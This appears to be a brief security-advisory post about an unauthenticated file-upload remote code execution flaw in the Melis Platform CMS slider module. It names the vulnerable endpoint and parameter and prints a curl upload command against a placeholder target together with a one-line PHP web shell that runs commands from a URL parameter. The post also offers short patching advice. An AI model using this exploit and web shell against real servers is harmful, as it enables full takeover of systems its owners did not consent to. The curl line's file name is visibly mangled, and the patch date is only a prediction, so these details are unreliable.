Listen to this Post
How the mentioned CVE works:
The vulnerability exists within the ‘melis-cms-slider’ module of Melis Platform. An attacker can send a direct, unauthenticated POST request to the endpoint ‘/melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm’. This endpoint accepts file uploads via the ‘mcsdetail_img’ parameter without properly validating the user’s session or the file’s contents. By uploading a malicious file, such as a web shell with a .php extension, the attacker can bypass security controls. The uploaded file is then stored in a publicly accessible web directory. Once uploaded, the attacker can simply navigate to the location of the file in their browser, triggering its execution and achieving unauthenticated Remote Code Execution on the underlying server, granting them full control.
Platform: Melis Platform
Version: (Affected Versions)
Vulnerability : Unauthenticated RCE
Severity: Critical
date: 2024-10-08
Prediction: Patch by 2024-10-25
What Undercode Say:
curl -X POST http://<target>/melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm -F "[email protected]"
<?php system($_GET['cmd']); ?>
How Exploit:
Direct unauthenticated HTTP request.
Uploads malicious PHP file.
Triggers the file for RCE.
Protection from this CVE:
Apply vendor patch.
Implement strong file-type verification.
Restrict upload directory execution.
Impact:
Complete system compromise.
Unauthenticated attacker access.
Arbitrary code execution.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
